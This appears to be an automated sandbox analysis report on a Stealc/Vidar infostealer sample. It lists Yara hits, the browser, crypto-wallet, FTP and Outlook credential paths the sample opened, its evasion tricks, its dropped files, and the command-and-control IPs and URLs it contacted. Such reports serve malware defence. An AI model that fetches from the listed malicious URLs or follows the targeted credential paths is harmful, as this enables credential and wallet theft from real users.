Source: Yara match File source: 00000000.00000003.2049143003.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2823336323.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2962532261.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2121583298.0000000000F41000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3049738520.0000000000DE1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2080978095.00000000055A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2679072667.0000000005590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3281229291.0000000000E21000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2090393813.0000000000C91000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3083306691.0000000000E21000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 12.2.4065fbc12b.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.4065fbc12b.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.4065fbc12b.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2972384169.00000000008E1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2959289490.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.3083910123.00000000015EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.3040133340.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.3081596240.00000000008E1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2729570719.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2975327681.000000000155B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2956448987.00000000008E1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2870998548.0000000005260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 4065fbc12b.exe PID: 7928, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4065fbc12b.exe PID: 7184, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4065fbc12b.exe PID: 2764, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: 4065fbc12b.exe PID: 7928, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 4065fbc12b.exe, 00000008.00000002.2956448987.000000000093A000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: Electrum
Source: 4065fbc12b.exe, 00000008.00000002.2959289490.00000000015F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\ElectronCash\wallets\\*.*Y
Source: 4065fbc12b.exe, 00000008.00000002.2956448987.000000000093A000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: \Electrum\wallets\
Source: 4065fbc12b.exe, 00000008.00000002.2956448987.000000000093A000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: window-state.json
Source: 4065fbc12b.exe, 00000008.00000002.2956448987.000000000096F000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: 4065fbc12b.exe, 00000008.00000002.2956448987.000000000093A000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: exodus.conf.json
Source: 4065fbc12b.exe, 00000008.00000002.2956448987.000000000093A000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: \Exodus\
Source: 4065fbc12b.exe, 00000008.00000002.2956448987.000000000093A000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: info.seco
Source: 4065fbc12b.exe, 00000008.00000002.2956448987.000000000093A000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: ElectrumLTC
Source: 4065fbc12b.exe, 00000008.00000002.2956448987.000000000093A000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: passphrase.json
Source: 4065fbc12b.exe, 00000008.00000002.2956448987.000000000096F000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: 4065fbc12b.exe, 00000008.00000002.2956448987.000000000093A000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: \Ethereum\
Source: 4065fbc12b.exe, 00000008.00000002.2956448987.000000000093A000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: Exodus
Source: 4065fbc12b.exe, 00000008.00000002.2959289490.00000000015F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.json
Source: 4065fbc12b.exe, 00000008.00000002.2956448987.000000000093A000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: Ethereum
Source: 4065fbc12b.exe, 00000008.00000002.2956448987.0000000000972000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: file__0.localstorage
Source: 4065fbc12b.exe, 00000008.00000002.2956448987.0000000000AAB000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: 4065fbc12b.exe, 00000008.00000002.2956448987.000000000093A000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: 4065fbc12b.exe, 00000008.00000002.2959289490.0000000001622000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\MultiDoge\\multidoge.wallet*
Source: 4065fbc12b.exe, 00000008.00000002.2956448987.000000000093A000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: seed.seco
Source: 4065fbc12b.exe, 00000008.00000002.2956448987.000000000093A000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: keystore
Source: 4065fbc12b.exe, 00000008.00000002.2956448987.000000000093A000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Source: 4065fbc12b.exe, 00000008.00000002.2959289490.0000000001622000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\*.*glU
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000008.00000002.2959289490.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 4065fbc12b.exe PID: 7928, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 12.2.4065fbc12b.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.4065fbc12b.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.4065fbc12b.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2972384169.00000000008E1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2959289490.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.3083910123.00000000015EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.3040133340.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.3081596240.00000000008E1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2729570719.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2975327681.000000000155B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2956448987.00000000008E1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2870998548.0000000005260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 4065fbc12b.exe PID: 7928, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4065fbc12b.exe PID: 7184, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4065fbc12b.exe PID: 2764, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: 4065fbc12b.exe PID: 7928, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C470C40 sqlite3_bind_zeroblob, 8_2_6C470C40
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C470D60 sqlite3_bind_parameter_name, 8_2_6C470D60
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C398EA0 sqlite3_clear_bindings, 8_2_6C398EA0
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C470B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 8_2_6C470B40
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C396410 bind,WSAGetLastError, 8_2_6C396410
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C39C030 sqlite3_bind_parameter_count, 8_2_6C39C030
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C396070 PR_Listen, 8_2_6C396070
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C39C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 8_2_6C39C050
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3960B0 listen,WSAGetLastError, 8_2_6C3960B0
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3222D0 sqlite3_bind_blob, 8_2_6C3222D0
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3963C0 PR_Bind, 8_2_6C3963C0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1519428 Sample: file.exe Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 66 Suricata IDS alerts for network traffic 2->66 68 Found malware configuration 2->68 70 Antivirus detection for URL or domain 2->70 72 12 other signatures 2->72 7 axplong.exe 2 19 2->7         started        12 file.exe 5 2->12         started        14 4d1c7345ec.exe 2->14         started        16 6 other processes 2->16 process3 dnsIp4 62 185.215.113.16, 49712, 49714, 49717 WHOLESALECONNECTIONSNL Portugal 7->62 64 185.215.113.103, 49713, 49715, 49765 WHOLESALECONNECTIONSNL Portugal 7->64 46 C:\Users\user\AppData\...\4d1c7345ec.exe, PE32 7->46 dropped 48 C:\Users\user\AppData\...\4065fbc12b.exe, PE32 7->48 dropped 50 C:\Users\user\AppData\Local\...\random[1].exe, PE32 7->50 dropped 52 C:\Users\user\AppData\Local\...\random[1].exe, PE32 7->52 dropped 92 Creates multiple autostart registry keys 7->92 94 Hides threads from debuggers 7->94 96 Tries to detect sandboxes / dynamic malware analysis system (registry check) 7->96 18 4065fbc12b.exe 34 7->18         started        23 4d1c7345ec.exe 4 7->23         started        54 C:\Users\user\AppData\Local\...\axplong.exe, PE32 12->54 dropped 56 C:\Users\user\...\axplong.exe:Zone.Identifier, ASCII 12->56 dropped 98 Detected unpacking (changes PE section rights) 12->98 100 Tries to evade debugger and weak emulator (self modifying code) 12->100 102 Tries to detect virtualization through RDTSC time measurements 12->102 25 axplong.exe 12->25         started        104 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 14->104 27 skotes.exe 14->27         started        106 Antivirus detection for dropped file 16->106 108 Machine Learning detection for dropped file 16->108 29 skotes.exe 16->29         started        file5 signatures6 process7 dnsIp8 58 185.215.113.37, 49716, 49734, 49744 WHOLESALECONNECTIONSNL Portugal 18->58 34 C:\Users\user\AppData\...\softokn3[1].dll, PE32 18->34 dropped 36 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 18->36 dropped 38 C:\Users\user\AppData\...\mozglue[1].dll, PE32 18->38 dropped 44 9 other files (5 malicious) 18->44 dropped 74 Antivirus detection for dropped file 18->74 76 Detected unpacking (changes PE section rights) 18->76 78 Tries to steal Mail credentials (via file / registry access) 18->78 90 5 other signatures 18->90 40 C:\Users\user\AppData\Local\...\skotes.exe, PE32 23->40 dropped 80 Machine Learning detection for dropped file 23->80 82 Tries to evade debugger and weak emulator (self modifying code) 23->82 84 Hides threads from debuggers 23->84 31 skotes.exe 23->31         started        60 185.215.113.43, 49760, 49763, 80 WHOLESALECONNECTIONSNL Portugal 27->60 42 C:\Users\user\AppData\...\951fa0b99a.exe, PE32 27->42 dropped 86 Tries to detect sandboxes / dynamic malware analysis system (registry check) 27->86 88 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 27->88 file9 signatures10 process11 signatures12 110 Antivirus detection for dropped file 31->110 112 Detected unpacking (changes PE section rights) 31->112 114 Tries to detect sandboxes and other dynamic analysis tools (window names) 31->114 116 5 other signatures 31->116
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.37
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.103
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.37/ true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.103/steam/random.exe false
  • Avira URL Cloud: malware
 unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.43/Zu7JuNko/index.php true
  • Avira URL Cloud: phishing
 unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.37/e2b1563c6670f193.php true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.16/Jo89Ku7d/index.php true
  • Avira URL Cloud: phishing
 unknown